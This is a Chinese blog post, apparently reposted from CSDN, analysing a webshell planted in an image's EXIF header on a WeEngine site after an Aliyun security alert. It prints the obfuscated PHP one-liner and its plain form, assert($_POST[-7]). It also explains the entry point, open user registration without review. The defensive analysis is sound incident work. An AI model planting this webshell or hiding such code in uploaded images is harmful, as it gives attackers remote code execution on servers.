阿里云提示微擎被挂图片木马详解_随记-CSDN博客_微擎上传后门

阿里云提示:

然后 找到目录文件瞅一眼是个啥,打开还真是个图片。

既然提示是木马,总的分析一下看看,exif_read_data函数读取 EXIF 头信息

看下图片注释头信息:

<?php@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>

木马原形:

<?php assert($_POST[-7])?> 使用原理不做介绍了。

简单说下使用微擎的过程中存在的问题,因为这个马是微擎站挂上的。

我检查了微擎站点的,这个应该是我使用过程中粗心导致的,排查过程发现系统多了几个test111这类用户。而图片木马就是通过其中一个账户上传的,主要原因应该是开启了用户注册,然后注册用户设置为不需要审核,然后流氓通过注册用户来登陆后台,上传自己的图片木马。

用户可以通过 xxxx.com/web/index.php?c=user&a=registerset& 检查站点是否开启了用户注册。关掉用户注册功能即可

如果不放心可以xxxx.com/web/index.php?c=user&a=register检测是否开启了该功能。

提醒一下演示站最好做好权限管理。

Original url: Access
Created at: 2020-07-29 09:27:34
Category: default
Tags: none

未标明原创文章均为采集,版权归作者所有,转载无需和我联系,请注明原出处,南摩阿彌陀佛,知识,不只知道,要得到

请先后发表评论
  • 最新评论
  • 总共0条评论